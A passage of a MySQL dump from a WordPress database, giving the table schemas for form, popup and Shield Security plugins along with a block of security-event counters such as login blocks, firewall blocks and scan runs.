color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0);
/*!40000 ALTER TABLE `lwz_formmaker_themes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_formmaker_views`
--

DROP TABLE IF EXISTS `lwz_formmaker_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_formmaker_views` (
  `form_id` int(11) NOT NULL,
  `views` int(50) NOT NULL,
  PRIMARY KEY (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_formmaker_views`
--

LOCK TABLES `lwz_formmaker_views` WRITE;
/*!40000 ALTER TABLE `lwz_formmaker_views` DISABLE KEYS */;
INSERT INTO `lwz_formmaker_views` VALUES (3,25);
/*!40000 ALTER TABLE `lwz_formmaker_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_hustle_entries`
--

DROP TABLE IF EXISTS `lwz_hustle_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_hustle_entries` (
  `entry_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_type` varchar(191) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `module_id` bigint(20) unsigned NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`entry_id`),
  KEY `entry_type` (`entry_type`),
  KEY `entry_module_id` (`module_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_hustle_entries`
--

LOCK TABLES `lwz_hustle_entries` WRITE;
/*!40000 ALTER TABLE `lwz_hustle_entries` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_hustle_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_hustle_entries_meta`
--

DROP TABLE IF EXISTS `lwz_hustle_entries_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_hustle_entries_meta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`),
  KEY `meta_entry_id` (`entry_id`),
  KEY `meta_key_object` (`entry_id`,`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_hustle_entries_meta`
--

LOCK TABLES `lwz_hustle_entries_meta` WRITE;
/*!40000 ALTER TABLE `lwz_hustle_entries_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_hustle_entries_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_hustle_modules`
--

DROP TABLE IF EXISTS `lwz_hustle_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_hustle_modules` (
  `module_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `blog_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `module_name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `module_type` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `active` tinyint(4) DEFAULT '1',
  `test_mode` tinyint(4) DEFAULT '0',
  `module_mode` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`module_id`),
  KEY `blog_id` (`blog_id`),
  KEY `active` (`active`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_hustle_modules`
--

LOCK TABLES `lwz_hustle_modules` WRITE;
/*!40000 ALTER TABLE `lwz_hustle_modules` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_hustle_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_hustle_modules_meta`
--

DROP TABLE IF EXISTS `lwz_hustle_modules_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_hustle_modules_meta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `module_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`meta_id`),
  KEY `module_id` (`module_id`),
  KEY `meta_key` (`meta_key`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_hustle_modules_meta`
--

LOCK TABLES `lwz_hustle_modules_meta` WRITE;
/*!40000 ALTER TABLE `lwz_hustle_modules_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_hustle_modules_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_hustle_tracking`
--

DROP TABLE IF EXISTS `lwz_hustle_tracking`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_hustle_tracking` (
  `tracking_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `module_id` bigint(20) unsigned NOT NULL,
  `page_id` bigint(20) unsigned NOT NULL,
  `module_type` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `action` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `ip` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `counter` mediumint(8) unsigned NOT NULL DEFAULT '1',
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`tracking_id`),
  KEY `tracking_module_id` (`module_id`),
  KEY `action` (`action`),
  KEY `tracking_module_object` (`action`,`module_id`,`module_type`),
  KEY `tracking_module_object_ip` (`module_id`,`tracking_id`,`ip`),
  KEY `tracking_date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_hustle_tracking`
--

LOCK TABLES `lwz_hustle_tracking` WRITE;
/*!40000 ALTER TABLE `lwz_hustle_tracking` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_hustle_tracking` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_at_logs`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_at_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_at_logs` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary ID',
  `req_ref` int(11) unsigned NOT NULL COMMENT 'Foreign Key For Primary ID',
  `site_id` int(11) unsigned NOT NULL DEFAULT '1' COMMENT 'Site ID',
  `event_slug` varchar(120) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '' COMMENT 'Event Slug',
  `updated_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Last Updated',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Created',
  PRIMARY KEY (`id`),
  KEY `req_ref` (`req_ref`),
  CONSTRAINT `lwz_icwp_wpsf_at_logs_ibfk_1` FOREIGN KEY (`req_ref`) REFERENCES `lwz_icwp_wpsf_req_logs` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_at_logs`
--

LOCK TABLES `lwz_icwp_wpsf_at_logs` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_at_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_at_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_at_meta`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_at_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_at_meta` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary ID',
  `log_ref` int(11) unsigned NOT NULL COMMENT 'Reference to primary log entry',
  `meta_key` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '' COMMENT 'Meta Key',
  `meta_value` text COLLATE utf8mb4_unicode_520_ci COMMENT 'Meta Data',
  PRIMARY KEY (`id`),
  KEY `log_ref` (`log_ref`),
  CONSTRAINT `lwz_icwp_wpsf_at_meta_ibfk_1` FOREIGN KEY (`log_ref`) REFERENCES `lwz_icwp_wpsf_at_logs` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_at_meta`
--

LOCK TABLES `lwz_icwp_wpsf_at_meta` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_at_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_at_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_botsignal`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_botsignal`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_botsignal` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary ID',
  `ip_ref` int(11) unsigned NOT NULL COMMENT 'Foreign Key For Primary ID',
  `notbot_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'NotBot',
  `frontpage_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Any Frontend Page Loaded',
  `loginpage_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Login Page Loaded',
  `bt404_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'BotTrack 404',
  `btfake_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'BotTrack FakeWebCrawler',
  `btcheese_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'BotTrack LinkCheese',
  `btloginfail_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'BotTrack LoginFailed',
  `btua_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'BotTrack Useragent Fail',
  `btxml_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'BotTrack XMLRPC Access',
  `btlogininvalid_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'BotTrack LoginInvalid',
  `btinvalidscript_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'BotTrack InvalidScript',
  `cooldown_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Cooldown Triggered',
  `humanspam_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Comment Marked As Human SPAM',
  `markspam_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Mark Comment As SPAM',
  `unmarkspam_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Unmark Comment As SPAM',
  `captchapass_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Captcha Passed',
  `captchafail_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Captcha Failed',
  `auth_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Successful Login',
  `firewall_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Triggered Firewall',
  `ratelimit_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Rate Limit Exceeded',
  `offense_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Last Offense',
  `blocked_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Last Block',
  `unblocked_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Unblocked',
  `bypass_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Bypass',
  `snsent_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Sent To ShieldNET',
  `updated_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Last Updated',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Created',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Soft Deleted',
  PRIMARY KEY (`id`),
  KEY `ip_ref` (`ip_ref`),
  CONSTRAINT `lwz_icwp_wpsf_botsignal_ibfk_1` FOREIGN KEY (`ip_ref`) REFERENCES `lwz_icwp_wpsf_ips` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_botsignal`
--

LOCK TABLES `lwz_icwp_wpsf_botsignal` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_botsignal` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_botsignal` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_events`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_events` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `event` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'none' COMMENT 'Event ID',
  `count` int(11) unsigned NOT NULL DEFAULT '0' COMMENT 'Total',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=7317 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_events`
--

LOCK TABLES `lwz_icwp_wpsf_events` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_events` DISABLE KEYS */;
INSERT INTO `lwz_icwp_wpsf_events` VALUES (2,'firewall_block',27,1535734841,0),(3,'login_block',3511,1535734841,0),(4,'session_terminate',17,1535734841,0),(5,'session_start',30,1535734841,0),(6,'firewall_block',27,1535734841,0),(7,'hide_login_url',1182,1535734841,0),(4670,'test_cron_run',134,1546300801,0),(4679,'scan_run',131,1546300801,0),(4677,'scan_run',131,1546300801,0),(4675,'scan_run',130,1546300801,0),(4682,'login_block',85,1546300801,0),(606,'firewall_block',2,1551398401,0),(7265,'scan_run',1,1632113445,0),(7266,'scan_run',1,1632113445,0),(7273,'login_block',208,1630886401,0),(7259,'test_cron_run',1,1631951194,0),(7243,'test_cron_run',1,1631607702,0),(7244,'scan_run',1,1631679329,0),(6556,'botbox_fail',10,1628121601,0),(6501,'login_block',22,1622505601,0),(6107,'test_cron_run',28,1617235201,0),(7253,'scan_run',1,1631852220,0),(7254,'scan_run',1,1631852220,0),(4672,'botbox_fail',82,1546300801,0),(4673,'bottrack_loginfailed',14,1546300801,0),(4680,'session_start',4,1546300801,0),(5222,'session_terminate',2,1613257201,0),(6662,'scan_run',7,1629072001,0),(6304,'test_cron_run',35,1619827201,0),(6300,'botbox_fail',54,1619827201,0),(6305,'login_block',62,1619827201,0),(6299,'cooldown_fail',8,1619827201,0),(6497,'scan_run',28,1622505601,0),(6499,'scan_run',28,1622505601,0),(6498,'scan_run',28,1622505601,0),(7021,'botbox_fail',8,1630800001,0),(7010,'login_block',11,1630800001,0),(6708,'cooldown_fail',3,1630821601,0),(5677,'scan_run',1,1618461359,0),(5424,'firewall_block',1,1615596599,0),(7267,'botbox_fail',161,1630886401,0),(5420,'botbox_fail',17,1615334401,0),(5421,'login_block',17,1615334401,0),(6301,'scan_run',35,1619827201,0),(5797,'scan_run',35,1614556801,0),(5798,'scan_run',35,1614556801,0),(5871,'scan_run',1,1620874079,0),(5582,'scan_run',2,1612137601,0),(7235,'scan_run',7,1630281601,0),(7241,'scan_run',1,1631600055,0),(6599,'scan_run',7,1627862401,0),(7248,'scan_run',1,1631766185,0),(6630,'scan_run',7,1628467201,0),(6632,'scan_run',7,1628467201,0),(5586,'test_cron_run',28,1612137601,0),(7314,'test_cron_run',1,1632297105,0),(4993,'session_terminate',3,1611619201,0),(5581,'botbox_fail',26,1612137601,0),(5592,'login_block',27,1612137601,0),(7252,'scan_run',1,1631852220,0),(3114,'session_terminate',6,1593561601,0),(5796,'scan_run',35,1614556801,0),(2033,'test_cron_run',34,1583020801,0),(2037,'scan_run',34,1583020801,0),(3349,'login_block',15,1596240001,0),(721,'cooldown_fail',1,1576641170,0),(6730,'test_cron_run',7,1629676801,0),(5799,'test_cron_run',35,1614556801,0),(7272,'test_cron_run',7,1630886401,0),(6496,'botbox_fail',22,1622505601,0),(6728,'scan_run',7,1629676801,0),(6676,'login_block',16,1625097601,0),(3115,'login_block',123,1593561601,0),(4669,'test_cron_run',35,1604188801,0),(2420,'firewall_block',1,1593639808,0),(7271,'scan_run',7,1630886401,0),(6663,'scan_run',7,1629072001,0),(3342,'botbox_fail',15,1596240001,0),(1487,'test_cron_run',29,1577836801,0),(1490,'scan_run',29,1577836801,0),(1492,'scan_run',29,1577836801,0),(1491,'scan_run',29,1577836801,0),(3106,'botbox_fail',110,1593561601,0),(2225,'scan_run',28,1585699201,0),(1154,'session_start',2,1581292801,0),(1146,'session_terminate',1,1581295743,0),(1489,'botbox_fail',17,1577836801,0),(1494,'login_block',17,1577836801,0),(5104,'cooldown_fail',36,1606780801,0),(1847,'test_cron_run',30,1580515201,0),(1849,'scan_run',29,1580515201,0),(1851,'scan_run',29,1580515201,0),(1850,'scan_run',29,1580515201,0),(1848,'botbox_fail',127,1580515201,0),(1856,'login_block',127,1580515201,0),(2901,'login_block',22,1590969601,0),(2413,'botbox_fail',9,1588291201,0),(3343,'scan_run',36,1596240001,0),(3345,'scan_run',36,1596240001,0),(1911,'firewall_block',1,1586415789,0),(1912,'firewall_block',1,1586415789,0),(2088,'firewall_block',1,1588994384,0),(6727,'scan_run',7,1629676801,0),(7264,'scan_run',1,1632113445,0),(7260,'scan_run',1,1632024272,0),(7240,'scan_run',1,1631600055,0),(6104,'scan_run',28,1617235201,0),(6106,'scan_run',28,1617235201,0),(6105,'scan_run',28,1617235201,0),(7249,'scan_run',1,1631766185,0),(7250,'scan_run',1,1631766185,0),(7251,'test_cron_run',1,1631779416,0),(5107,'scan_run',28,1606780801,0),(5217,'session_start',1,1613258312,0),(240,'session_terminate',1,1570808536,0),(3332,'session_start',3,1601251201,0),(3340,'test_cron_run',35,1596240001,0),(4315,'scan_run',28,1601510401,0),(3346,'session_start',5,1596240001,0),(3347,'session_terminate',5,1596240001,0),(3968,'scan_run',27,1598918401,0),(3969,'scan_run',27,1598918401,0),(7301,'scan_run',1,1632197356,0),(7236,'scan_run',7,1630281601,0),(7258,'scan_run',1,1631938116,0),(6670,'botbox_fail',11,1625097601,0),(4674,'scan_run',36,1604188801,0),(4678,'scan_run',36,1604188801,0),(4676,'scan_run',36,1604188801,0),(6633,'test_cron_run',7,1628467201,0),(6303,'scan_run',35,1619827201,0),(5110,'test_cron_run',28,1606780801,0),(4668,'cooldown_fail',23,1604188801,0),(7274,'test_cron_run',1,1632124335,0),(7310,'botbox_fail',12,1632096001,0),(3970,'scan_run',27,1598918401,0),(4314,'scan_run',28,1601510401,0),(6500,'test_cron_run',28,1622505601,0),(5423,'firewall_block',1,1615596599,0),(3333,'session_terminate',3,1601251201,0),(5332,'test_cron_run',28,1609459201,0),(7270,'scan_run',7,1630886401,0),(7299,'scan_run',1,1632197356,0),(6631,'scan_run',7,1628467201,0),(6302,'scan_run',35,1619827201,0),(6672,'scan_run',29,1625097601,0),(6674,'scan_run',29,1625097601,0),(6673,'scan_run',29,1625097601,0),(5324,'botbox_fail',97,1609459201,0),(5333,'login_block',104,1609459201,0),(5323,'cooldown_fail',7,1609459201,0),(7256,'scan_run',1,1631938116,0),(7257,'scan_run',1,1631938116,0),(6103,'botbox_fail',60,1617235201,0),(6108,'login_block',60,1617235201,0),(6598,'scan_run',7,1627862401,0),(5112,'login_block',82,1606780801,0),(5170,'cooldown_fail',1,1612892853,0),(5583,'scan_run',28,1612137601,0),(5585,'scan_run',28,1612137601,0),(5584,'scan_run',28,1612137601,0),(6729,'scan_run',7,1629676801,0),(2883,'cooldown_fail',13,1595894401,0),(4316,'scan_run',28,1601510401,0),(3965,'test_cron_run',28,1598918401,0),(7263,'test_cron_run',1,1632037296,0),(6600,'scan_run',7,1627862401,0),(6675,'test_cron_run',28,1625097601,0),(4992,'session_start',7,1611619201,0),(2898,'scan_run',35,1590969601,0),(2900,'scan_run',35,1590969601,0),(2897,'botbox_fail',22,1590969601,0),(2417,'login_block',9,1588291201,0),(1853,'firewall_block',4,1580515201,0),(2412,'test_cron_run',28,1588291201,0),(2414,'scan_run',28,1588291201,0),(2416,'scan_run',28,1588291201,0),(2415,'scan_run',28,1588291201,0),(3967,'botbox_fail',16,1598918401,0),(2036,'botbox_fail',41,1583020801,0),(2044,'login_block',41,1583020801,0),(4681,'login_block',70,1604188801,0),(3105,'test_cron_run',28,1593561601,0),(4671,'botbox_fail',47,1604188801,0),(3110,'scan_run',30,1593561601,0),(7269,'scan_run',7,1630886401,0),(2221,'botbox_fail',14,1585699201,0),(2229,'login_block',14,1585699201,0),(2896,'test_cron_run',35,1590969601,0),(937,'session_start',3,1579392001,0),(938,'session_terminate',3,1579392001,0),(2899,'scan_run',35,1590969601,0),(2040,'firewall_block',44,1583020801,0),(2039,'scan_run',34,1583020801,0),(2038,'scan_run',34,1583020801,0),(2041,'firewall_block',44,1583020801,0),(4311,'test_cron_run',28,1601510401,0),(4313,'botbox_fail',147,1601510401,0),(4318,'login_block',173,1601510401,0),(4310,'cooldown_fail',26,1601510401,0),(5106,'botbox_fail',46,1606780801,0),(2419,'firewall_block',1,1593639808,0),(2219,'test_cron_run',28,1585699201,0),(2223,'scan_run',28,1585699201,0),(2227,'scan_run',28,1585699201,0),(3112,'scan_run',30,1593561601,0),(3108,'scan_run',30,1593561601,0),(1855,'firewall_block',4,1580515201,0),(3344,'scan_run',36,1596240001,0),(7237,'scan_run',7,1630281601,0),(7300,'scan_run',1,1632197356,0),(6557,'login_block',10,1628121601,0),(7245,'scan_run',1,1631679329,0),(7246,'scan_run',1,1631679329,0),(7247,'test_cron_run',1,1631691662,0),(7239,'test_cron_run',1,1631518453,0),(6601,'test_cron_run',7,1627862401,0),(6665,'test_cron_run',7,1629072001,0),(7238,'test_cron_run',7,1630281601,0),(5109,'scan_run',28,1606780801,0),(5108,'scan_run',28,1606780801,0),(7268,'cooldown_fail',47,1630886401,0),(7261,'scan_run',1,1632024272,0),(7262,'scan_run',1,1632024272,0),(7242,'scan_run',1,1631600055,0),(5322,'scan_run',5,1609459201,0),(5326,'scan_run',29,1609459201,0),(5330,'scan_run',29,1609459201,0),(5328,'scan_run',29,1609459201,0),(7255,'test_cron_run',1,1631870766,0),(3113,'session_start',7,1593561601,0),(3972,'login_block',40,1598918401,0),(3964,'cooldown_fail',24,1598918401,0),(6671,'cooldown_fail',5,1625097601,0),(6664,'scan_run',7,1629072001,0),(2087,'firewall_block',1,1588994384,0),(7232,'scan_run',1,1631505927,0),(7233,'scan_run',1,1631505927,0),(7234,'scan_run',1,1631505927,0),(7313,'login_block',12,1632096001,0),(7304,'test_cron_run',1,1632209982,0),(7312,'scan_run',2,1632283201,0),(7311,'scan_run',2,1632283201,0),(7307,'scan_run',1,1632283229,0),(7315,'session_start',2,1632312105,0),(7316,'session_terminate',1,1632312105,0);
/*!40000 ALTER TABLE `lwz_icwp_wpsf_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_filelocker`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_filelocker`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_filelocker` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `file` varchar(256) COLLATE utf8mb4_unicode_520_ci NOT NULL COMMENT 'File Path relative to ABSPATH',
  `hash_original` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL COMMENT 'SHA1 File Hash Original',
  `hash_current` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL COMMENT 'SHA1 File Hash Current',
  `content` mediumblob COMMENT 'Content',
  `public_key_id` tinyint(2) unsigned NOT NULL COMMENT 'Public Key ID',
  `detected_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Change Last Detected',
  `reverted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Reverted To Backup',
  `notified_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Notification Sent',
  `updated_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Updated At',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Created At',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Soft Deleted At',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_filelocker`
--

LOCK TABLES `lwz_icwp_wpsf_filelocker` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_filelocker` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_filelocker` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_ip_lists`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_ip_lists`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_icwp_wpsf_ip_lists` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(60) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '' COMMENT 'Human readable IP address or range',
  `label` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '' COMMENT 'Description',
  `list` varchar(4) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '' COMMENT 'Block or Bypass',
  `ip6` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT 'Is IPv6',
  `is_range` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT 'Is Range',
  `transgressions` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Total Offenses',
  `last_access_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Last Access By IP',
  `blocked_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'IP Blocked',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Created At',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0' COMMENT 'Soft Deleted At',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_icwp_wpsf_ip_lists`
--

LOCK TABLES `lwz_icwp_wpsf_ip_lists` WRITE;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_ip_lists` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_icwp_wpsf_ip_lists` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_icwp_wpsf_ips`
--

DROP TABLE IF EXISTS `lwz_icwp_wpsf_ips`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
